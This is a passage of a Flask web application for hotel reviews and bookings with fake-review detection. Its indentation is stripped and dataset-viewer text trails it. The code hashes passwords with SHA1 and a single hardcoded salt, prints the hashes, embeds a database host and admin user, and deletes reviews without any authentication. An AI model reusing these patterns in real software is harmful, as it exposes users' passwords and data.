Fake_review_5_Algos.mlmodels_2()
return render_template('hotelsInBangalore.html')
else:
return render_template('alertbangalore.html')
return render_template('hotelsInBangalore.html')
# **************************************************************************************************************
@app.route('/index.html')
def index1():
return render_template('index.html')
@app.route('/HomePage.html')
def homepage():
return render_template('HomePage.html')
@app.route('/dashboard.html')
def home1():
return render_template('dashboard.html')
@app.route('/login.html')
def login():
return render_template('login.html')
@app.route('/UserLogin.html')
def UserLogin():
return render_template('UserLogin.html')
def get_hexdigest(algo, salt, passw):
hash = hashlib.sha1()
hash.update(('%s%s' % (salt, passw)).encode('utf-8'))
password_hash = hash.hexdigest()
print(password_hash)
return password_hash
@app.route('/index.html', methods=['GET', 'POST'])
def index():
msg = ''
print("hello")
if request.method == 'POST' and 'fullname' in request.form and 'password' in request.form and 'email' in request.form and 'confirmpassword' in request.form:
print("hello")
username = request.form['fullname']
password = request.form['password']
email = request.form['email']
cpassword = request.form['confirmpassword']
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE username = % s', (username,))
account = cursor.fetchone()
print(account)
if account:
msg = 'Account already exists !'
elif not re.match(r'[^@]+@[^@]+\.[^@]+', email):
msg = 'Invalid email address !'
elif not re.match(r'[A-Za-z0-9]+', username):
msg = 'Username must contain only characters and numbers !'
elif not re.match(r'[A-Za-z0-9]+', password):
msg = 'Enter valid password!'
elif not re.match(password, cpassword):
msg = 'Enter valid confirm password'
elif not username or not password or not email or not cpassword:
msg = 'Please fill out the form !'
else:
import random
algo = 'sha1'
salt = 'radhakrishna'
hsh = get_hexdigest(algo, salt, password)
cursor.execute('INSERT INTO user_registered VALUES (% s, % s, % s)', (username, hsh, email,))
mysql.connection.commit()
msg = 'You have successfully registered !'
return render_template('index.html', msg=msg)
elif request.method == 'POST' and 'username' in request.form and 'password1' in request.form:
username = request.form['username']
password1 = request.form['password1']
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM user_registered WHERE username = % s', (username,))
account = cursor.fetchone()
print(account)
enc_password= account['password']
algo='sha1'
salt= 'radhakrishna'
if enc_password == get_hexdigest(algo, salt, password1):
session['loggedin'] = True
msg = 'Logged in successfully !'
return render_template('index.html', msg=msg)
else:
msg = 'Incorrect username / password !'
return render_template('UserLogin.html', msg=msg)
# ***************************************************************************************************
# ****************************************Percentage**********************************************
def general():
df = pd.read_csv('out.csv')
header = ["ReviewID", "Reviews", 'Hotel', "City", "UserName", "Polarity"]
df.columns = header
a = df.groupby(["City", "Hotel", "Polarity"], as_index=False)["Reviews"].count()
print("general function\n")
print(a)
City = list(a['City'])
Hotel = list(a['Hotel'])
Polarity = list(a['Polarity'])
Reviews = list(a['Reviews'])
Cities = set(City)
return a, City, Hotel, Polarity, Reviews, Cities
def pune():
# pune
a, City, Hotel, Polarity, Reviews, Cities = general()
print("pune function")
print("\n")
print(a)
l1 = list() # negative
l11 = list()
h1 = list() # positive
h11 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Pune":
if Polarity[j] == 0:
l1.append(Reviews[j])
l11.append(Hotel[j])
elif Polarity[j] == 1:
h1.append(Reviews[j])
h11.append(Hotel[j])
print(l1)
print(l11)
print(h1)
print(h11)
totalHotelPercentPune = dict()
for i in range(len(h11)):
sum = l1[i] + h1[i]
posPercent = (h1[i] / sum) * 100
totalHotelPercentPune[h11[i]] = round(posPercent, 2)
return totalHotelPercentPune, l1, l11, h1, h11
# print(totalHotelPercentPune)
def mumbai():
# Mumbai
a, City, Hotel, Polarity, Reviews, Cities = general()
l2 = list()
l12 = list()
h2 = list()
h12 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Mumbai":
if Polarity[j] == 0:
l2.append(Reviews[j])
l12.append(Hotel[j])
elif Polarity[j] == 1:
h2.append(Reviews[j])
h12.append(Hotel[j])
totalHotelPercentMum = dict()
for i in range(len(h12)):
sum = l2[i] + h2[i]
posPercent = (h2[i] / sum) * 100
totalHotelPercentMum[h12[i]] = round(posPercent, 2)
return totalHotelPercentMum, l2, l12, h2, h12
def kolkata():
# kolkatta
a, City, Hotel, Polarity, Reviews, Cities = general()
l3 = list()
l13 = list()
h3 = list()
h13 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Kolkata":
if Polarity[j] == 0:
l3.append(Reviews[j])
l13.append(Hotel[j])
elif Polarity[j] == 1:
h3.append(Reviews[j])
h13.append(Hotel[j])
totalHotelPercentkol = dict()
for i in range(len(h13)):
sum = l3[i] + h3[i]
posPercent = (h3[i] / sum) * 100
totalHotelPercentkol[h13[i]] = round(posPercent, 2)
return totalHotelPercentkol, l3, l13, h3, h13
def bangalore():
# Bangalore
a, City, Hotel, Polarity, Reviews, Cities = general()
l4 = list()
l14 = list()
h4 = list()
h14 = list()
for j in range(len(a['Hotel'])):
if City[j] == "Bangalore":
if Polarity[j] == 0:
l4.append(Reviews[j])
l14.append(Hotel[j])
elif Polarity[j] == 1:
h4.append(Reviews[j])
h14.append(Hotel[j])
totalHotelPercentbang = dict()
for i in range(len(h14)):
sum = l4[i] + h4[i]
posPercent = (h4[i] / sum) * 100
totalHotelPercentbang[h14[i]] = round(posPercent, 2)
return totalHotelPercentbang, l4, l14, h4, h14
# ****************************************Percentage*************************************************
# ***************************************************************************************************
@app.route('/hotelsInPune.html')
def hotelsInPune():
print("In hotel pune ")
conn = MySQLdb.connect("svc-5f63a094-b9ed-4c30-9f33-37e0a5e348f3-ddl.azr-virginia-2.svc.singlestore.com", "admin", pw, "beproject")
cur = conn.cursor()
cur.execute('select user,reviews from review where hotel="Orchid" and city="Pune"')
data = cur.fetchall() # data from user_registered database
cur.execute('select user,reviews from review where hotel="Novotel" and city="Pune"')
data1 = cur.fetchall() # data from book_room database
cur.execute('select user,reviews from review where hotel="Conrad" and city="Pune"')
data2 = cur.fetchall() # data from book_table database
cur.execute('select user,reviews from review where hotel="Courtyard" and city="Pune"')
data3 = cur.fetchall() # data from book_table database
percentage, l1, l11, h1, h11 = pune()
print("Hii", percentage)
percentOrchid = str(percentage['Orchid'])
percentNovotel = str(percentage['Novotel'])
percentConrad = str(percentage['Conrad'])
percentCourtyard = str(percentage['Courtyard'])
'''percentOrchid=str("80")
percentNovotel=str("80")
percentConrad=str("80")
percentCourtyard=str("80")'''
percentOrchid = percentOrchid + "% Positive Reviews"
percentNovotel = percentNovotel + "% Positive Reviews"
percentConrad = percentConrad + "% Positive Reviews"
percentCourtyard = percentCourtyard + "% Positive Reviews"
percentOrchid1 = percentage['Orchid']
percentNovotel1 = percentage['Novotel']
percentConrad1 = percentage['Conrad']
percentCourtyard1 = percentage['Courtyard']
list_of_pune = list()
for i in range(len(l1)):
j = l1[i] + h1[i]
list_of_pune.append(j)
print("Total count of reviews for pune ")
print(list_of_pune)
return render_template("hotelsInPune.html", value=data, value1=data1, value2=data2, value3=data3,
value4=percentOrchid, value5=percentNovotel, value6=percentConrad, value7=percentCourtyard,
value8=percentOrchid1, value9=percentNovotel1, value10=percentConrad1,
value11=percentCourtyard1, value12=list_of_pune[0], value13=list_of_pune[1],
value14=list_of_pune[2], value15=list_of_pune[3])
@app.route('/hotelsInMumbai.html')
def hotelsInMumbai():
conn = MySQLdb.connect("svc-5f63a094-b9ed-4c30-9f33-37e0a5e348f3-ddl.azr-virginia-2.svc.singlestore.com", "admin", pw, "beproject")
cur = conn.cursor()
cur.execute('select user,reviews from review where hotel="Hilton" and city="Mumbai"')
data = cur.fetchall() # data from user_registered database
cur.execute('select user,reviews from review where hotel="Taj" and city="Mumbai"')
data1 = cur.fetchall() # data from book_room database
cur.execute('select user,reviews from review where hotel="ITC" and city="Mumbai"')
data2 = cur.fetchall() # data from book_table database
cur.execute('select user,reviews from review where hotel="Maratha" and city="Mumbai"')
data3 = cur.fetchall() # data from book_table database
percentage, l2, l12, h2, h12 = mumbai()
percentHilton = str(percentage['Hilton'])
percentTaj = str(percentage['Taj'])
percentITC = str(percentage['ITC'])
percentMaratha = str(percentage['Maratha'])
percentHilton = percentHilton + "% Positive Reviews"
percentTaj = percentTaj + "% Positive Reviews"
percentITC = percentITC + "% Positive Reviews"
percentMaratha = percentMaratha + "% Positive Reviews"
percentHilton1 = percentage['Hilton']
percentTaj1 = percentage['Taj']
percentITC1 = percentage['ITC']
percentMaratha1 = percentage['Maratha']
list_of_mumbai = list()
for i in range(len(l2)):
j = l2[i] + h2[i]
list_of_mumbai.append(j)
print("Total count of reviews for mumbai ")
print(list_of_mumbai)
return render_template("hotelsInMumbai.html", value=data, value1=data1, value2=data2, value3=data3,
value4=percentHilton, value5=percentTaj, value6=percentITC, value7=percentMaratha,
value8=percentHilton1, value9=percentTaj1, value10=percentITC1, value11=percentMaratha1,
value12=list_of_mumbai[0], value13=list_of_mumbai[1], value14=list_of_mumbai[2],
value15=list_of_mumbai[3])
@app.route('/hotelsInKolkata.html')
def hotelsInKolkata():
conn = MySQLdb.connect("svc-5f63a094-b9ed-4c30-9f33-37e0a5e348f3-ddl.azr-virginia-2.svc.singlestore.com", "admin", pw, "beproject")
cur = conn.cursor()
cur.execute('select user,reviews from review where hotel="ITC" and city="Kolkata"')
data = cur.fetchall() # data from user_registered database
cur.execute('select user,reviews from review where hotel="Oberoi" and city="Kolkata"')
data1 = cur.fetchall() # data from book_room database
cur.execute('select user,reviews from review where hotel="Taj" and city="Kolkata"')
data2 = cur.fetchall() # data from book_table database
cur.execute('select user,reviews from review where hotel="Marriott" and city="Kolkata"')
data3 = cur.fetchall() # data from book_table database
percentage, l3, l13, h3, h13 = kolkata()
percentITC = str(percentage['ITC'])
percentOberoi = str(percentage['Oberoi'])
percentTaj = str(percentage['Taj'])
percentMarriott = str(percentage['Marriott'])
percentITC = percentITC + "% Positive Reviews"
percentOberoi = percentOberoi + "% Positive Reviews"
percentTaj = percentTaj + "% Positive Reviews"
percentMarriott = percentMarriott + "% Positive Reviews"
percentITC1 = percentage['ITC']
percentOberoi1 = percentage['Oberoi']
percentTaj1 = percentage['Taj']
percentMarriott1 = percentage['Marriott']
list_of_kolkata = list()
for i in range(len(l3)):
j = l3[i] + h3[i]
list_of_kolkata.append(j)
print("Total count of reviews for Kolkata ")
print(list_of_kolkata)
return render_template("hotelsInKolkata.html", value=data, value1=data1, value2=data2, value3=data3,
value4=percentITC, value5=percentOberoi, value6=percentTaj, value7=percentMarriott,
value8=percentITC1, value9=percentOberoi1, value10=percentTaj1, value11=percentMarriott1,
value12=list_of_kolkata[0], value13=list_of_kolkata[1], value14=list_of_kolkata[2],
value15=list_of_kolkata[3])
@app.route('/hotelsInBangalore.html')
def hotelsInBangalore():
conn = MySQLdb.connect("svc-5f63a094-b9ed-4c30-9f33-37e0a5e348f3-ddl.azr-virginia-2.svc.singlestore.com", "admin", pw, "beproject")
cur = conn.cursor()
cur.execute('select user,reviews from review where hotel="WelcomHotel" and city="Bangalore"')
data = cur.fetchall() # data from user_registered database
cur.execute('select user,reviews from review where hotel="Leela" and city="Bangalore"')
data1 = cur.fetchall() # data from book_room database
cur.execute('select user,reviews from review where hotel="Conrad" and city="Bangalore"')
data2 = cur.fetchall() # data from book_table database
cur.execute('select user,reviews from review where hotel="Windsor" and city="Bangalore"')
data3 = cur.fetchall() # data from book_table database
percentage, l4, l14, h4, h14 = bangalore()
percentWelcomHotel = str(percentage['WelcomHotel'])
percentLeela = str(percentage['Leela'])
percentConrad = str(percentage['Conrad'])
percentWindsor = str(percentage['Windsor'])
percentWelcomHotel = percentWelcomHotel + "% Positive Reviews"
percentLeela = percentLeela + "% Positive Reviews"
percentConrad = percentConrad + "% Positive Reviews"
percentWindsor = percentWindsor + "% Positive Reviews"
percentWelcomHotel1 = percentage['WelcomHotel']
percentLeela1 = percentage['Leela']
percentConrad1 = percentage['Conrad']
percentWindsor1 = percentage['Windsor']
list_of_bangalore = list()
for i in range(len(l4)):
j = l4[i] + h4[i]
list_of_bangalore.append(j)
print("Total count of reviews for bangalore ")
print(list_of_bangalore)
return render_template("hotelsInBangalore.html", value=data, value1=data1, value2=data2, value3=data3,
value4=percentWelcomHotel, value5=percentLeela, value6=percentConrad, value7=percentWindsor,
value8=percentWelcomHotel1, value9=percentLeela1, value10=percentConrad1,
value11=percentWindsor1, value12=list_of_bangalore[0], value13=list_of_bangalore[1],
value14=list_of_bangalore[2], value15=list_of_bangalore[3])
@app.route('/bookRoom.html')
def bookRoom():
return render_template('bookRoom.html')
@app.route('/bookTable.html')
def bookTable():
return render_template('bookTable.html')
@app.route('/Booked.html', methods=['POST'])
def Booked():
msg = ''
print("hello")
if request.method == 'POST' and 'fullname' in request.form and 'phone' in request.form and 'email' in request.form and 'no_of_rooms' in request.form:
print("hello")
hotel_city = request.form['hotel1']
h1 = hotel_city.split(",")
hotel = h1[0]
city1 = h1[1]
fullname = request.form['fullname']
phone = request.form['phone']
email = request.form['email']
no_of_rooms = request.form['no_of_rooms']
city = request.form['city']
checkin = request.form['checkin']
no_of_people = request.form['no_of_people']
other_needs = request.form['other_needs']
checkout = request.form['checkout']
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM book_room WHERE name = % s', (fullname,))
account = cursor.fetchone()
print(account)
cursor.execute('INSERT INTO book_room VALUES (% s, % s, % s, %s, %s, %s, %s, %s ,%s,%s,%s)', (
fullname, email, phone, city, checkin, no_of_people, no_of_rooms, other_needs, checkout, hotel, city1))
mysql.connection.commit()
msg = 'You have successfully registered !'
return render_template('Booked.html', msg=msg)
elif request.method == 'POST' and 'data_3' in request.form and 'data_4' in request.form and 'data_5' in request.form and 'data_7' in request.form:
print("hello")
hotel_city = request.form['hotel1']
h1 = hotel_city.split(",")
hotel = h1[0]
city1 = h1[1]
fullname = request.form['data_3']
phone = request.form['data_4']
email = request.form['data_5']
date = request.form['data_6']
intime = request.form['data_7']
outtime = request.form['data_33']
no_of_people = request.form['data_8']
add_request = request.form['data_9']
cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
cursor.execute('SELECT * FROM book_table WHERE name = % s', (fullname,))
account = cursor.fetchone()
print(account)
cursor.execute('INSERT INTO book_table VALUES (% s, % s, % s, %s,%s, %s, %s, %s,%s,%s)',
(fullname, email, phone, date, intime, outtime, no_of_people, add_request, hotel, city1))
mysql.connection.commit()
msg = 'You have successfully registered !'
return render_template('Booked.html', msg=msg)
@app.route('/delete.html/<int:ReviewID>')
def delete(ReviewID):
cur = mysql.connection.cursor(MySQLdb.cursors.DictCursor)
print(type(ReviewID))
cur.execute('select * from review where review_id=%s',(ReviewID,))
data = cur.fetchone()
print(data)
if data:
print("inside if")
cur.execute('delete from review where review_id=%s',(ReviewID,))
mysql.connection.commit()
cur.execute('select * from suspicious_reviews where review_id=%s',(ReviewID,))
data1=cur.fetchone()
if data1:
print("inside suspicious if")
cur.execute('delete from suspicious_reviews where review_id=%s', (ReviewID,))
mysql.connection.commit()
else:
print("Data not found in suspicious reviews")
updatedlist = []
ReviewID1=str(ReviewID)
with open("Hotelreview_testingData.csv", newline="\n") as f:
reader = csv.reader(f)
# username = input("Enter the username of the user you wish to remove from file:")
print(reader)
for row in reader: # for every row in the file
print("shukkkkk")
if not row:
continue
print(row[0])
if row[0] == "ReviewID":
header = ["ReviewID", "Reviews", "Hotel", "City", "UserName"]
updatedlist.append(header)
continue
if row[0] != ReviewID1: # as long as the username is not in the row .......
updatedlist.append(row) # add each row, line by line, into a list called 'udpatedlist'
print(updatedlist)
i = updatefile(updatedlist)
print(i)
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
else:
updatedlist = []
ReviewID1 = str(ReviewID)
with open("Hotelreview_testingData.csv", newline="\n") as f:
reader = csv.reader(f)
#username = input("Enter the username of the user you wish to remove from file:")
print(reader)
for row in reader: # for every row in the file
print("shukkkkk")
if not row:
continue
print(row[0])
if row[0] == "ReviewID":
header = ["ReviewID","Reviews","Hotel","City","UserName"]
updatedlist.append(header)
continue
if row[0] != ReviewID1: # as long as the username is not in the row .......
updatedlist.append(row) # add each row, line by line, into a list called 'udpatedlist'
print(updatedlist)
i=updatefile(updatedlist)
print(i)
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
return redirect(url_for('home1'))
def updatefile(updatedlist):
with open("Hotelreview_testingData.csv","w",newline="\n") as f:
Writer=csv.writer(f)
Writer.writerows(updatedlist)
print("File has been updated")
return 1
################################################
if __name__ == "__main__":
mlmodel.mlmodel()
Fake_review_5_Algos.mlmodels_2()
app.run(debug=True)
app.config['TEMPLATES_AUTO_RELOAD'] = True
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.